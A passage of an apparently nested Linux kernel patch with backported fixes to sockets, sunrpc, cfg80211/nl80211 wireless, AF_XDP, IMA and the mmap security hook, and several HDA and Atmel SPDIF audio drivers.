+  *	in sock->file. If dname is %NULL, sets to "".
+- *	On failure the return is a ERR pointer (see linux/err.h).
++ *
++ *	On failure @sock is released, and an ERR pointer is returned.
++ *
+  *	This function uses GFP_KERNEL internally.
+  */
+ 
+@@ -1613,7 +1615,6 @@ static struct socket *__sys_socket_create(int family, int type, int protocol)
+ struct file *__sys_socket_file(int family, int type, int protocol)
+ {
+ 	struct socket *sock;
+-	struct file *file;
+ 	int flags;
+ 
+ 	sock = __sys_socket_create(family, type, protocol);
+@@ -1624,11 +1625,7 @@ struct file *__sys_socket_file(int family, int type, int protocol)
+ 	if (SOCK_NONBLOCK != O_NONBLOCK && (flags & SOCK_NONBLOCK))
+ 		flags = (flags & ~SOCK_NONBLOCK) | O_NONBLOCK;
+ 
+-	file = sock_alloc_file(sock, flags, NULL);
+-	if (IS_ERR(file))
+-		sock_release(sock);
+-
+-	return file;
++	return sock_alloc_file(sock, flags, NULL);
+ }
+ 
+ int __sys_socket(int family, int type, int protocol)
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 0b0b9f1eed469..fd7e1c630493e 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -3350,6 +3350,8 @@ rpc_clnt_swap_deactivate_callback(struct rpc_clnt *clnt,
+ void
+ rpc_clnt_swap_deactivate(struct rpc_clnt *clnt)
+ {
++	while (clnt != clnt->cl_parent)
++		clnt = clnt->cl_parent;
+ 	if (atomic_dec_if_positive(&clnt->cl_swapper) == 0)
+ 		rpc_clnt_iterate_for_each_xprt(clnt,
+ 				rpc_clnt_swap_deactivate_callback, NULL);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 33a82ecab9d56..02b9a0280896c 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -13809,7 +13809,7 @@ static int nl80211_set_rekey_data(struct sk_buff *skb, struct genl_info *info)
+ 		return -ERANGE;
+ 	if (nla_len(tb[NL80211_REKEY_DATA_KCK]) != NL80211_KCK_LEN &&
+ 	    !(rdev->wiphy.flags & WIPHY_FLAG_SUPPORTS_EXT_KEK_KCK &&
+-	      nla_len(tb[NL80211_REKEY_DATA_KEK]) == NL80211_KCK_EXT_LEN))
++	      nla_len(tb[NL80211_REKEY_DATA_KCK]) == NL80211_KCK_EXT_LEN))
+ 		return -ERANGE;
+ 
+ 	rekey_data.kek = nla_data(tb[NL80211_REKEY_DATA_KEK]);
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 4b5b6ee0fe013..4f813e346a8bc 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -285,6 +285,15 @@ void cfg80211_conn_work(struct work_struct *work)
+ 	wiphy_unlock(&rdev->wiphy);
+ }
+ 
++static void cfg80211_step_auth_next(struct cfg80211_conn *conn,
++				    struct cfg80211_bss *bss)
++{
++	memcpy(conn->bssid, bss->bssid, ETH_ALEN);
++	conn->params.bssid = conn->bssid;
++	conn->params.channel = bss->channel;
++	conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++}
++
+ /* Returned bss is reference counted and must be cleaned up appropriately. */
+ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ {
+@@ -302,10 +311,7 @@ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ 	if (!bss)
+ 		return NULL;
+ 
+-	memcpy(wdev->conn->bssid, bss->bssid, ETH_ALEN);
+-	wdev->conn->params.bssid = wdev->conn->bssid;
+-	wdev->conn->params.channel = bss->channel;
+-	wdev->conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++	cfg80211_step_auth_next(wdev->conn, bss);
+ 	schedule_work(&rdev->conn_work);
+ 
+ 	return bss;
+@@ -597,7 +603,12 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	wdev->conn->params.ssid_len = wdev->u.client.ssid_len;
+ 
+ 	/* see if we have the bss already */
+-	bss = cfg80211_get_conn_bss(wdev);
++	bss = cfg80211_get_bss(wdev->wiphy, wdev->conn->params.channel,
++			       wdev->conn->params.bssid,
++			       wdev->conn->params.ssid,
++			       wdev->conn->params.ssid_len,
++			       wdev->conn_bss_type,
++			       IEEE80211_PRIVACY(wdev->conn->params.privacy));
+ 
+ 	if (prev_bssid) {
+ 		memcpy(wdev->conn->prev_bssid, prev_bssid, ETH_ALEN);
+@@ -608,6 +619,7 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	if (bss) {
+ 		enum nl80211_timeout_reason treason;
+ 
++		cfg80211_step_auth_next(wdev->conn, bss);
+ 		err = cfg80211_conn_do_work(wdev, &treason);
+ 		cfg80211_put_bss(wdev->wiphy, bss);
+ 	} else {
+@@ -724,6 +736,7 @@ void __cfg80211_connect_result(struct net_device *dev,
+ {
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	const struct element *country_elem = NULL;
++	const struct element *ssid;
+ 	const u8 *country_data;
+ 	u8 country_datalen;
+ #ifdef CONFIG_CFG80211_WEXT
+@@ -883,6 +896,22 @@ void __cfg80211_connect_result(struct net_device *dev,
+ 				   country_data, country_datalen);
+ 	kfree(country_data);
+ 
++	if (!wdev->u.client.ssid_len) {
++		rcu_read_lock();
++		for_each_valid_link(cr, link) {
++			ssid = ieee80211_bss_get_elem(cr->links[link].bss,
++						      WLAN_EID_SSID);
++
++			if (!ssid || !ssid->datalen)
++				continue;
++
++			memcpy(wdev->u.client.ssid, ssid->data, ssid->datalen);
++			wdev->u.client.ssid_len = ssid->datalen;
++			break;
++		}
++		rcu_read_unlock();
++	}
++
+ 	return;
+ out:
+ 	for_each_valid_link(cr, link)
+@@ -1468,6 +1497,15 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 	} else {
+ 		if (WARN_ON(connkeys))
+ 			return -EINVAL;
++
++		/* connect can point to wdev->wext.connect which
++		 * can hold key data from a previous connection
++		 */
++		connect->key = NULL;
++		connect->key_len = 0;
++		connect->key_idx = 0;
++		connect->crypto.cipher_group = 0;
++		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 9f0561b67c12e..13f62d2402e71 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -511,7 +511,7 @@ static struct sk_buff *xsk_build_skb(struct xdp_sock *xs,
+ 	return skb;
+ }
+ 
+-static int xsk_generic_xmit(struct sock *sk)
++static int __xsk_generic_xmit(struct sock *sk)
+ {
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	u32 max_batch = TX_BATCH_SIZE;
+@@ -594,22 +594,13 @@ out:
+ 	return err;
+ }
+ 
+-static int xsk_xmit(struct sock *sk)
++static int xsk_generic_xmit(struct sock *sk)
+ {
+-	struct xdp_sock *xs = xdp_sk(sk);
+ 	int ret;
+ 
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
+-	if (unlikely(!xs->tx))
+-		return -ENOBUFS;
+-
+-	if (xs->zc)
+-		return xsk_wakeup(xs, XDP_WAKEUP_TX);
+-
+ 	/* Drop the RCU lock since the SKB path might sleep. */
+ 	rcu_read_unlock();
+-	ret = xsk_generic_xmit(sk);
++	ret = __xsk_generic_xmit(sk);
+ 	/* Reaquire RCU lock before going into common code. */
+ 	rcu_read_lock();
+ 
+@@ -627,17 +618,31 @@ static bool xsk_no_wakeup(struct sock *sk)
+ #endif
+ }
+ 
++static int xsk_check_common(struct xdp_sock *xs)
++{
++	if (unlikely(!xsk_is_bound(xs)))
++		return -ENXIO;
++	if (unlikely(!(xs->dev->flags & IFF_UP)))
++		return -ENETDOWN;
++
++	return 0;
++}
++
+ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len)
+ {
+ 	bool need_wait = !(m->msg_flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	struct xsk_buff_pool *pool;
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(need_wait))
+ 		return -EOPNOTSUPP;
++	if (unlikely(!xs->tx))
++		return -ENOBUFS;
+ 
+ 	if (sk_can_busy_loop(sk)) {
+ 		if (xs->zc)
+@@ -649,8 +654,11 @@ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len
+ 		return 0;
+ 
+ 	pool = xs->pool;
+-	if (pool->cached_need_wakeup & XDP_WAKEUP_TX)
+-		return xsk_xmit(sk);
++	if (pool->cached_need_wakeup & XDP_WAKEUP_TX) {
++		if (xs->zc)
++			return xsk_wakeup(xs, XDP_WAKEUP_TX);
++		return xsk_generic_xmit(sk);
++	}
+ 	return 0;
+ }
+ 
+@@ -670,11 +678,11 @@ static int __xsk_recvmsg(struct socket *sock, struct msghdr *m, size_t len, int
+ 	bool need_wait = !(flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(!xs->rx))
+ 		return -ENOBUFS;
+ 	if (unlikely(need_wait))
+@@ -713,21 +721,20 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 	sock_poll_wait(file, sock, wait);
+ 
+ 	rcu_read_lock();
+-	if (unlikely(!xsk_is_bound(xs))) {
+-		rcu_read_unlock();
+-		return mask;
+-	}
++	if (xsk_check_common(xs))
++		goto skip_tx;
+ 
+ 	pool = xs->pool;
+ 
+ 	if (pool->cached_need_wakeup) {
+ 		if (xs->zc)
+ 			xsk_wakeup(xs, pool->cached_need_wakeup);
+-		else
++		else if (xs->tx)
+ 			/* Poll needs to drive Tx also in copy mode */
+-			xsk_xmit(sk);
++			xsk_generic_xmit(sk);
+ 	}
+ 
++skip_tx:
+ 	if (xs->rx && !xskq_prod_is_empty(xs->rx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 	if (xs->tx && xsk_tx_writeable(xs))
+diff --git a/scripts/bpf_doc.py b/scripts/bpf_doc.py
+index e8d90829f23ed..38d51e05c7a2b 100755
+--- a/scripts/bpf_doc.py
++++ b/scripts/bpf_doc.py
+@@ -271,7 +271,7 @@ class HeaderParser(object):
+             if capture:
+                 fn_defines_str += self.line
+                 helper_name = capture.expand(r'bpf_\1')
+-                self.helper_enum_vals[helper_name] = int(capture[2])
++                self.helper_enum_vals[helper_name] = int(capture.group(2))
+                 self.helper_enum_pos[helper_name] = i
+                 i += 1
+             else:
+diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
+index b34d11e226366..320afd3cf8e82 100644
+--- a/scripts/gcc-plugins/Makefile
++++ b/scripts/gcc-plugins/Makefile
+@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
+ plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
+ 		  -include $(srctree)/include/linux/compiler-version.h \
+ 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
+-		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
++		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
+ 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
+ 		  -ggdb -Wno-narrowing -Wno-unused-variable \
+ 		  -Wno-format-diag
+diff --git a/scripts/package/mkdebian b/scripts/package/mkdebian
+index 6cf383225b8b5..c3bbef7a6754f 100755
+--- a/scripts/package/mkdebian
++++ b/scripts/package/mkdebian
+@@ -236,7 +236,7 @@ binary-arch: build-arch
+ 	KBUILD_BUILD_VERSION=${revision} -f \$(srctree)/Makefile intdeb-pkg
+ 
+ clean:
+-	rm -rf debian/*tmp debian/files
++	rm -rf debian/files debian/linux-*
+ 	\$(MAKE) clean
+ 
+ binary: binary-arch
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index c1e76282b5ee5..1e3a7a4f8833f 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -292,7 +292,7 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 		result = ima_calc_file_hash(file, &hash.hdr);
+ 	}
+ 
+-	if (result == -ENOMEM)
++	if (result && result != -EBADF && result != -EINVAL)
+ 		goto out;
+ 
+ 	length = sizeof(hash.hdr) + hash.hdr.length;
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index 377300973e6c5..53dc438009204 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -337,7 +337,7 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 	hash_algo = ima_get_hash_algo(xattr_value, xattr_len);
+ 
+ 	rc = ima_collect_measurement(iint, file, buf, size, hash_algo, modsig);
+-	if (rc == -ENOMEM)
++	if (rc != 0 && rc != -EBADF && rc != -EINVAL)
+ 		goto out_locked;
+ 
+ 	if (!pathbuf)	/* ima_rdwr_violation possibly pre-fetched */
+@@ -397,7 +397,9 @@ out:
+ /**
+  * ima_file_mmap - based on policy, collect/store measurement.
+  * @file: pointer to the file to be measured (May be NULL)
+- * @prot: contains the protection that will be applied by the kernel.
++ * @reqprot: protection requested by the application
++ * @prot: protection that will be applied by the kernel
++ * @flags: operational flags
+  *
+  * Measure files being mmapped executable based on the ima_must_measure()
+  * policy decision.
+@@ -405,7 +407,8 @@ out:
+  * On success return 0.  On integrity appraisal error, assuming the file
+  * is in policy and IMA-appraisal is in enforcing mode, return -EACCES.
+  */
+-int ima_file_mmap(struct file *file, unsigned long prot)
++int ima_file_mmap(struct file *file, unsigned long reqprot,
++		  unsigned long prot, unsigned long flags)
+ {
+ 	u32 secid;
+ 
+diff --git a/security/security.c b/security/security.c
+index d1571900a8c7d..174afa4fad813 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -1661,12 +1661,13 @@ static inline unsigned long mmap_prot(struct file *file, unsigned long prot)
+ int security_mmap_file(struct file *file, unsigned long prot,
+ 			unsigned long flags)
+ {
++	unsigned long prot_adj = mmap_prot(file, prot);
+ 	int ret;
+-	ret = call_int_hook(mmap_file, 0, file, prot,
+-					mmap_prot(file, prot), flags);
++
++	ret = call_int_hook(mmap_file, 0, file, prot, prot_adj, flags);
+ 	if (ret)
+ 		return ret;
+-	return ima_file_mmap(file, prot);
++	return ima_file_mmap(file, prot, prot_adj, flags);
+ }
+ 
+ int security_mmap_addr(unsigned long addr)
+diff --git a/sound/pci/hda/Kconfig b/sound/pci/hda/Kconfig
+index 06d304db4183c..886255a03e8b4 100644
+--- a/sound/pci/hda/Kconfig
++++ b/sound/pci/hda/Kconfig
+@@ -302,6 +302,20 @@ config SND_HDA_INTEL_HDMI_SILENT_STREAM
+ 	  This feature can impact power consumption as resources
+ 	  are kept reserved both at transmitter and receiver.
+ 
++config SND_HDA_CTL_DEV_ID
++	bool "Use the device identifier field for controls"
++	depends on SND_HDA_INTEL
++	help
++	  Say Y to use the device identifier field for (mixer)
++	  controls (old behaviour until this option is available).
++
++	  When enabled, the multiple HDA codecs may set the device
++	  field in control (mixer) element identifiers. The use
++	  of this field is not recommended and defined for mixer controls.
++
++	  The old behaviour (Y) is obsolete and will be removed. Consider
++	  to not enable this option.
++
+ endif
+ 
+ endmenu
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index 2e728aad67713..9f79c0ac2bda7 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -3389,7 +3389,12 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			kctl = snd_ctl_new1(knew, codec);
+ 			if (!kctl)
+ 				return -ENOMEM;
+-			if (addr > 0)
++			/* Do not use the id.device field for MIXER elements.
++			 * This field is for real device numbers (like PCM) but codecs
++			 * are hidden components from the user space view (unrelated
++			 * to the mixer element identification).
++			 */
++			if (addr > 0 && codec->ctl_dev_id)
+ 				kctl->id.device = addr;
+ 			if (idx > 0)
+ 				kctl->id.index = idx;
+@@ -3400,9 +3405,11 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			 * the codec addr; if it still fails (or it's the
+ 			 * primary codec), then try another control index
+ 			 */
+-			if (!addr && codec->core.addr)
++			if (!addr && codec->core.addr) {
+ 				addr = codec->core.addr;
+-			else if (!idx && !knew->index) {
++				if (!codec->ctl_dev_id)
++					idx += 10 * addr;
++			} else if (!idx && !knew->index) {
+ 				idx = find_empty_mixer_ctl_idx(codec,
+ 							       knew->name, 0);
+ 				if (idx <= 0)
+diff --git a/sound/pci/hda/hda_controller.c b/sound/pci/hda/hda_controller.c
+index 0ff286b7b66be..083df287c1a48 100644
+--- a/sound/pci/hda/hda_controller.c
++++ b/sound/pci/hda/hda_controller.c
+@@ -1231,6 +1231,7 @@ int azx_probe_codecs(struct azx *chip, unsigned int max_slots)
+ 				continue;
+ 			codec->jackpoll_interval = chip->jackpoll_interval;
+ 			codec->beep_mode = chip->beep_mode;
++			codec->ctl_dev_id = chip->ctl_dev_id;
+ 			codecs++;
+ 		}
+ 	}
+diff --git a/sound/pci/hda/hda_controller.h b/sound/pci/hda/hda_controller.h
+index f5bf295eb8307..8556031bcd68e 100644
+--- a/sound/pci/hda/hda_controller.h
++++ b/sound/pci/hda/hda_controller.h
+@@ -124,6 +124,7 @@ struct azx {
+ 	/* HD codec */
+ 	int  codec_probe_mask; /* copied from probe_mask option */
+ 	unsigned int beep_mode;
++	bool ctl_dev_id;
+ 
+ #ifdef CONFIG_SND_HDA_PATCH_LOADER
+ 	const struct firmware *fw;
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 87002670c0c92..81c4a45254ff2 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -50,6 +50,7 @@
+ #include <sound/intel-dsp-config.h>
+ #include <linux/vgaarb.h>
+ #include <linux/vga_switcheroo.h>
++#include <linux/apple-gmux.h>
+ #include <linux/firmware.h>
+ #include <sound/hda_codec.h>
+ #include "hda_controller.h"
+@@ -119,6 +120,7 @@ static bool beep_mode[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS-1)] =
+ 					CONFIG_SND_HDA_INPUT_BEEP_MODE};
+ #endif
+ static bool dmic_detect = 1;
++static bool ctl_dev_id = IS_ENABLED(CONFIG_SND_HDA_CTL_DEV_ID) ? 1 : 0;
+ 
+ module_param_array(index, int, NULL, 0444);
+ MODULE_PARM_DESC(index, "Index value for Intel HD audio interface.");
+@@ -157,6 +159,8 @@ module_param(dmic_detect, bool, 0444);
+ MODULE_PARM_DESC(dmic_detect, "Allow DSP driver selection (bypass this driver) "
+ 			     "(0=off, 1=on) (default=1); "
+ 		 "deprecated, use snd-intel-dspcfg.dsp_driver option instead");
++module_param(ctl_dev_id, bool, 0444);
++MODULE_PARM_DESC(ctl_dev_id, "Use control device identifier (based on codec address).");
+ 
+ #ifdef CONFIG_PM
+ static int param_set_xint(const char *val, const struct kernel_param *kp);
+@@ -1463,7 +1467,7 @@ static struct pci_dev *get_bound_vga(struct pci_dev *pci)
+ 				 * vgaswitcheroo.
+ 				 */
+ 				if (((p->class >> 16) == PCI_BASE_CLASS_DISPLAY) &&
+-				    atpx_present())
++				    (atpx_present() || apple_gmux_detect(NULL, NULL)))
+ 					return p;
+ 				pci_dev_put(p);
+ 			}
+@@ -2278,6 +2282,8 @@ static int azx_probe_continue(struct azx *chip)
+ 	chip->beep_mode = beep_mode[dev];
+ #endif
+ 
++	chip->ctl_dev_id = ctl_dev_id;
++
+ 	/* create codec instances */
+ 	if (bus->codec_mask) {
+ 		err = azx_probe_codecs(chip, azx_max_codecs[chip->driver_type]);
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index 0a292bf271f2e..acde4cd58785e 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -2455,7 +2455,7 @@ static int dspio_set_uint_param(struct hda_codec *codec, int mod_id,
+ static int dspio_alloc_dma_chan(struct hda_codec *codec, unsigned int *dma_chan)
+ {
+ 	int status = 0;
+-	unsigned int size = sizeof(dma_chan);
++	unsigned int size = sizeof(*dma_chan);
+ 
+ 	codec_dbg(codec, "     dspio_alloc_dma_chan() -- begin\n");
+ 	status = dspio_scp(codec, MASTERCONTROL, 0x20,
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e103bb3693c06..d4819890374b5 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11617,6 +11617,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0698, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x069f, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x1632, "HP RP5800", ALC662_FIXUP_HP_RP5800),
++	SND_PCI_QUIRK(0x103c, 0x870c, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+diff --git a/sound/pci/ice1712/aureon.c b/sound/pci/ice1712/aureon.c
+index 9a30f6d35d135..40a0e00950301 100644
+--- a/sound/pci/ice1712/aureon.c
++++ b/sound/pci/ice1712/aureon.c
+@@ -1892,6 +1892,7 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 		unsigned char id;
+ 		snd_ice1712_save_gpio_status(ice);
+ 		id = aureon_cs8415_get(ice, CS8415_ID);
++		snd_ice1712_restore_gpio_status(ice);
+ 		if (id != 0x41)
+ 			dev_info(ice->card->dev,
+ 				 "No CS8415 chip. Skipping CS8415 controls.\n");
+@@ -1909,7 +1910,6 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 					kctl->id.device = ice->pcm->device;
+ 			}
+ 		}
+-		snd_ice1712_restore_gpio_status(ice);
+ 	}
+ 
+ 	return 0;
+diff --git a/sound/soc/atmel/mchp-spdifrx.c b/sound/soc/atmel/mchp-spdifrx.c
+index ec0705cc40fab..76ce37f641ebd 100644
+--- a/sound/soc/atmel/mchp-spdifrx.c
++++ b/sound/soc/atmel/mchp-spdifrx.c
+@@ -217,7 +217,6 @@ struct mchp_spdifrx_ch_stat {
+ struct mchp_spdifrx_user_data {
+ 	unsigned char data[SPDIFRX_UD_BITS / 8];
+ 	struct completion done;
+-	spinlock_t lock;	/* protect access to user data */
+ };
+ 
+ struct mchp_spdifrx_mixer_control {
+@@ -231,13 +230,13 @@ struct mchp_spdifrx_mixer_control {
+ struct mchp_spdifrx_dev {
+ 	struct snd_dmaengine_dai_dma_data	capture;
+ 	struct mchp_spdifrx_mixer_control	control;
+-	spinlock_t				blockend_lock;	/* protect access to blockend_refcount */
+-	int					blockend_refcount;
++	struct mutex				mlock;
+ 	struct device				*dev;
+ 	struct regmap				*regmap;
+ 	struct clk				*pclk;
+ 	struct clk				*gclk;
+ 	unsigned int				fmt;
++	unsigned int				trigger_enabled;
+ 	unsigned int				gclk_enabled:1;
+ };
+ 
+@@ -275,37 +274,11 @@ static void mchp_spdifrx_channel_user_data_read(struct mchp_spdifrx_dev *dev,
+ 	}
+ }
+ 
+-/* called from non-atomic context only */
+-static void mchp_spdifrx_isr_blockend_en(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount++;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 1)
+-		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+-/* called from atomic/non-atomic context */
+-static void mchp_spdifrx_isr_blockend_dis(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount--;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 0)
+-		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ {
+ 	struct mchp_spdifrx_dev *dev = dev_id;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 sr, imr, pending, idr = 0;
++	u32 sr, imr, pending;
+ 	irqreturn_t ret = IRQ_NONE;
+ 	int ch;
+ 
+@@ -320,13 +293,10 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 
+ 	if (pending & SPDIFRX_IR_BLOCKEND) {
+ 		for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+-			spin_lock(&ctrl->user_data[ch].lock);
+ 			mchp_spdifrx_channel_user_data_read(dev, ch);
+-			spin_unlock(&ctrl->user_data[ch].lock);
+-
+ 			complete(&ctrl->user_data[ch].done);
+ 		}
+-		mchp_spdifrx_isr_blockend_dis(dev);
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+@@ -334,7 +304,7 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		if (pending & SPDIFRX_IR_CSC(ch)) {
+ 			mchp_spdifrx_channel_status_read(dev, ch);
+ 			complete(&ctrl->ch_stat[ch].done);
+-			idr |= SPDIFRX_IR_CSC(ch);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(ch));
+ 			ret = IRQ_HANDLED;
+ 		}
+ 	}
+@@ -344,8 +314,6 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+-	regmap_write(dev->regmap, SPDIFRX_IDR, idr);
+-
+ 	return ret;
+ }
+ 
+@@ -353,47 +321,40 @@ static int mchp_spdifrx_trigger(struct snd_pcm_substream *substream, int cmd,
+ 				struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
+-	int running;
+-	int ret;
+-
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-	running = !!(mr & SPDIFRX_MR_RXEN_ENABLE);
++	int ret = 0;
+ 
+ 	switch (cmd) {
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		if (!running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_ENABLE;
+-			/* enable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IER,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Enable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_OVERRUN);
++
++		/* Enable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++		dev->trigger_enabled = true;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		if (running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_DISABLE;
+-			/* disable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IDR,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Disable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_OVERRUN);
++
++		/* Disable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++		dev->trigger_enabled = false;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	default:
+-		return -EINVAL;
+-	}
+-
+-	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
+-	if (ret) {
+-		dev_err(dev->dev, "unable to enable/disable RX: %d\n", ret);
+-		return ret;
++		ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+@@ -401,7 +362,7 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 				  struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
++	u32 mr = 0;
